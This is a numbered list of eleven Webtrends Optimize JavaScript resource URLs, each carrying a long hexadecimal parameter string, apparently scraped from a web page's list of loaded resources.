14.32. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5634a7f054ba3498f73914ebeb4a7b43817e4a18fdd93098342a6389f2866e08f3e2e75638d737d198594ecd0cb755bca9cf478e40640a4400dacda9d56d8e247c53b46449047ebc45b62d489ac921adcd1b2097f4226a4de10944e8169319c042664cece1cf1de9bc4844c947cbb2366e05715c017443ba29ce8751730be12d1255f915ab3b50ca55b9ce8187d9ecf1da2246ca847d1bf13bf5dc051b6546dbf2d4dad7e8c1acc3530e9f11df75ceb12cc34353b784491f7c1e2cf3d6cc6e3bc92db9afadca8b91f3645e7d7cac0890b131adf1666129b04db5b02237cdf5fc14fb6a2a5e043dc564b12bd3a620b252d8d3613373433f6b9797f933b28413e12012614aff95f89c5f2a321a556699232da5557002622ffeeaf331e5a1517ef7dd8ebcbf314c51f4d9ac13351a216800c1db0659fa269bbc251edd7f5315d5879ad3e01d0bd06

14.33. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5f17400eebc8ad58213ce16bc76e20e58ddb0521b5346b74a4c0b939fab858b3845c5caa275bc4214e60652fa9aa826b79c23b45e6234f1698d945b37d393f4800dc3a2a9476e2d5ed2d305ea49962b64c3436639f0bf7addb8f9b9e12c8519ea7235d21c5abd3d7908bbb3cb7f0a2af95a84640afa25d7ce67c628fb921a16d88849f87d3fc71f87e7419344c94c9c1323fe7456a364ce5d8d6724f1fd739c1cac4a83263f2979488ce483ba917a1990a0ecd4c893e99feff5432c51f3a68c87965f494d925c31489802d15f032f689206a648a9d2f7bc0dfa475111832c2541355de16a1f3c2678feb3792b9330741c6017413d02c6951bccc9a8b82de25772df23e13f44417b6eede2ee36065d431eea7dd3b7cba811de4f509edd201df746c4470dae7efd9506c5a523fe8eef3b5a4362e076fcf94d7c3b0474c9933a1b478b3ecbf1f03da2c7f2ab59dc60a3145422052fdbcd470b595d50e9e319190f85e380470d46bbe2e34f825cb0104cd4c0be9de734592e19b94bc22f0b7b34a958b37a9b82f9c8006566f05e9b1fdbd5efb8c0706b546f5df1cc09994c53f2fddb5cbdcfad20dd8caeda6a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fba901c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce724eefde8062313b83757f5babedd5c5f14625c7812596dbd375692a55d3ba0de51fcb6782c458b2bd098141e8ee93f98552ab24ffd09783844bfcdf15ad2cfd41cd8a6a6ce410e38848d815fa6da7e345e4b46612ddbf7614bf714fcaa8d77bf303d453ed252d68b9b40fdc2c4715a768c049eae0878fcdfe0593004576ef3020a76c9eb01955607d2ddf183796f9a11232a0449899e98d449b371fa7a188cad976fad6267b3b4ad8df3963d05af9355e2323627f650a5b0315763e3e50cb1bf4f9d20d770827621faf142f690d6b91fe55225cc1f9ea56879a729cd74ba8a4ba5648d17d7d1af5032e00a0095a93d6bd7364c4cbf5bda0ddbf14f07d45d8f335d1af007900a7ba1bfee0ff8b186837a2a5cd569c5605b9249e02cf94a7

14.34. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c816bb73a1054dd6f61c085541b14b0f1cdc85bbc6c13104c5d4e138b4441efe4d0df29ac219ca9f33aa597333f06094a72f0b8693f583078ca7a20868390dd09a51f64f9632368b476625a1b97fdeb7fbe3ee2e9f15fc753db61b44d95d1c6d908adf73080ff95a857114d212e9df7fc023f7926c1affcf77ff603dec1e90cc59b840d67c805e76b06755b56dc15c816627f1e4749c07ae4b98253a37795a90f6d2ffd57b3693a6c9d99ecaa3c9a7a2527c08b4dbd7d1ef687965b66d7c1e975c8c4819341ab9128d14f9b1bdee50ad380f57e1607502342b902a0c35352af2b371709e343f483515143f0fc99e12cb86a0b22ab052728728bd3c0c456974ff8bd27744064404e26ad0fccbe513db005298de7110f64ccb4609be6beaa96988e67faccfed7a085828f21c9bea0b2773172bd891771d4d836ccdfffa31f995b8fc42887cb3575827453bccd907351c104cefba115a4bd9ee95130217e8bdfa0cd23ab3116e9c89e3d09b38184a5fe50c93587e762fa74be77fcad2faca5a3666a5599e4a86d7e4ecc7733b506d0fa6cc09cf1a56faa0dc59bfccaa26dd86f48b704209a9012b257d48680e37e775f52dbd038c4b143731ce21cd7914c25b15db25224b3bee5373935f185a89d99254f340d0f11ef6b280f8fa7d57a97bf7dff879d0253f5789af0b4e906e0259ea13157c8af715fefae0a517c4043d0ed61354c4279387ad91fbc67362e5ee491d9b9428d5ab48c026f3da596a3f7140ea7890f9f1807be6793e6641163ac21e4d1318d29893e16c3721d3cb0243980354f494882062679b747f4ca7f6919cb7407796802197808477612c0082bf53eb1a8d28c4b903e4cc0b860aefb0c1b29d53ab33f3cbd0809f1cac8b43fb29fd469fdc6b6ab046e78448d743a93ea6e917e4e43311dabd2011e0744e9affd57dfa06865fb7252769bab308d9291514a338c41bbfe2d3d9c5fe539f021722ba6875a46b9ae61b01352b7bd8133bc0aef41132a2109c99b6de15c83543f0a38fc8db26aad571263c1ddcd13d64d45ea865522576347b3f0d0d044a746f350acb15f7ff8856755a7c3212ab422a680e6ec1ae07755dccf9ed00d5cb749d874ca9a0bd514f81777a17f65d705af40a5d948ae67c37c6c3f9e9a1d8be17ac7c4e82a33f87f30d2454a9bb4bfdb2fbd7483e61a6a0cc5f955742fc6ec1cb515d04b739fb

14.35. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5

14.36. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de88e91464e5c4f2e7e8b8e49c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1b22975f829847a1bb97a632454077f22bd60e9752737af17b7f3a5e043e5fb2b19ff8a2da930eafc40001ec2a2e1a5c6d419b92b42da9e42b3f8727d752a7ce9a85cd79c4290b2689893e191e2335b7ff9456a8b5c025fe8e71214bb19474156af0428dc1727449e476e453c60e8049f6ec158e3a4f7ad2316b8e3d585921f8c1ab82eff410983ea1e4c0447e1091a4989d5e5ca8c772fc585ef589e6c18e5770df3ce9d109fbf1baa4d753cfb7197a13767bfd8e2d14b87f4cf4d29741fbcc70fa847d12576df4a6230a7bc7a88b7fbafe62c9210fd7937a40e46bd53123cbba5ea5c1d28ff40d12e44d110f0e51abe4ff7995c3dc69d0ab6366db646c2a200f4019510c70237ed765ea069c151816824ebe271991eaa46942e372f675b93f7c7e6ce3167cde2a18dc885e9b4c2f552631ff3c3d9c2960d170dd71e70158604df5f0c2f7dde51db55baccd8b915ee6a1c5cf269621d2543fc71496b7e3ffda879669731204e331d1a320ec6881bd399bff46fea0438cc32a9287d033f76a8a7e8701d5c1f13ee71c3e8d1ad16894b54c88e7314ad41c24c59ac72a9c003ccf770fd89b5395b4934e127f6f94f7a6b037099986d18478b6dc0f0f36bf5c5f5fe5a8c66f64651775328d7c610525e5052bab44c1d0bd0b68e465a46edb0ee4d8356b64518d9cbbec8b3655f2b48b94a95785d2c39f90fb7739cd2ff9a0e3660f30e994fd584eae897713e063a0df69a09ce1654f6a18a0cecc5a9248fdbf48379130dff507b252a176f0d66b076f42de6098b1a423561c574c47147c00610db74751a6fe0032791554f56dadec65bf44580f546f7b882f6a82759fd2fa38cac2dd7723455dfa0584cc56f0149f2047c69c9ea12a2a6a1ef409f1a6e0687105c8f37c7b9aac58e856536ff95100fab837590a86be078b3861a39337049be29c6faa1d62be77f6e36471033c044121d4fd391c2e43b6777d3c8165f8c3f17b68c8077343784267e1aa2fad295a01720c88b24c4dbd275602c0582b75ce24a8a73c3f816a0a349ca42a8f596f1d557a165f2cbcbdf8e4dabdd45a82efa46cb8c3a6ce346e4d71cd914f969fde916b0e36614d9ed7c40b0201b9efd832ffb008205b62a2e6bb8b20a88781f15f53ac31de2e5878acdfe5392531b70bc3974a43dc4e11f55607a2a8d196bc5f8f84766a613c8cab4dc11c8304ef3a0888bc33091c4333065178b822662db58fc6d442936657e385a59001e73383f019d1cf3ae800d795f74760bbf701d0f790be7ed5931019cbdf149cb04701d25

14.37. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d9276d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd

14.38. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a4589da09c95ec229342c85e3f04cdbb16eb68a479511547be78c1f0ed28bf417fafde52976aa735f427b71fe8ad1715b035931319a897b9da02c6a51709fd25f0ace2d1ab125b84dc11d0f68db4aee0d9d318306ccb23066c323cb2576b76864311a0a6a78f826f1277675fc4bfaa881c308e9f4003895cb78e65bc2cd7f2a3a9db2ffe3c0c918a12d40e4da1faebc2c2f3e363ce6b956cb87449bb223c081afa8d2152643cc7c0db0256c63e1b01a4ee608554900b86d0eb0694234ae670572150bbe11cc6dc85be5a2b8a12c4cbdfac68ed45f933eff36ed2e70f4b20f295557ae5a5008cd9b80affb0b36b3ec9e4ee47402e1451ce8dba70a9cbb07aa7a481dc807e8d0526dd493a0850bd9a1a40b6c345ad0824ef71bc32f76c2512561f7fb08daf5ace9f5228557ba2262b6430be204cc1a18

14.39. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c722d3fe129124a7880d3e6b7a1de879ccaca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5

14.40. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504096ebad4514097d6ea42a2aaa1722bfc6805023920a5cea144572e6e343d86b5428cb628720722ed8417529f7043e24af651d3065232800df809d929d406c381026ac30bf2057f84424832564b636da827f53a737cae48fbbbe7f343a9f53a45e1c472f42eeaa81b1753d9efa4be878149ec767699c605dcc25a776c1875b6ac5cd69b5d929e46a8b4d2acd3192124d25b3c9704495fd8e00d09ae35151442e17656a1754a31f2341d244709ba12cd69cc09e6b8eaa82a44a9e2c6c79f1cd33eb86eac041b89f90b084540fa130020e282ab85c86753c598e32be61a40ad115bb28fcb4cd9fc46c23f1e4b9c1de4dc5267d19ca38906d6afa60b6c335ed48259fe13cb297adf517a2aced63bcbecada3ed3a960df96629a50e58ae4c0178e7faa122406abe04d14b39d016e8e31aa84f99e4056bf4a35df87926ba4dd1a21ffd079714c50820e47d59b96dd659972566a8b031da0bb35df2617b373c19c5b4dde4ce3d69ccf6b59e8f90f2daf9b6156f1bb0cb98c78d0b4013d2173f1dd657de090d2027d750c94eaba1b0f554b23b5f05b5697157327f95360a35612ea4ec297f9766254e3715123d07c3c51ecacef5e222e1577edc72b13c16462e6befedeb66510d1111be7d80eb92aa438a4b029d892513ab41961f5aaf75ffce04cba025fc8cef680e1b66e970a5ab467d6a0d739e976c1f1d8a6dcba5f531f390f0f45e8967f71504700f2f889714595c5206e8e7491a5ad7e78b470e10e6bcb41b8301b41916d59fbb90e135577f1fe619942105793ef90cb82ecc80fa98596434f90d984edad0e5bd92722b197e67b3dd1fc9400cb7ea8654a0caf6248f87bacf297959af756d6072084056728133a669b77bfb470469769929c57142930d428d71771d3ae20022915c185680ddc652f917d0a04aa3b486f8a8280dad7ba48ff12e8423635d8cab094b976b070de61e102984f643f4fdb6ad17c406685c8a45069b2596d3a392fdc3276be3e84c1bcfce2985a91d9122f2d85c3a3f2c4ab82b95f9f7d62dbd2a3b324d1367971b1c1d198290c0e13b3777d2cf1156886c40b883d47b346180747440a6ac8591f61c72c18126c0d7d523617b5682bd58b743da7996af1aa4f24f9711fffb97a38155f734a1c2c18adb19acdc17ee66be2cd9ca7136ed44b29c1ed843ae62e6e151e0e6354189bb7611e37d4dcaf9872fa7568551bb31337ddd8563f91a6500ac2e9d1af9accbc502a7f64a

14.41. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2

14.42. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b1244870c1f77575f813e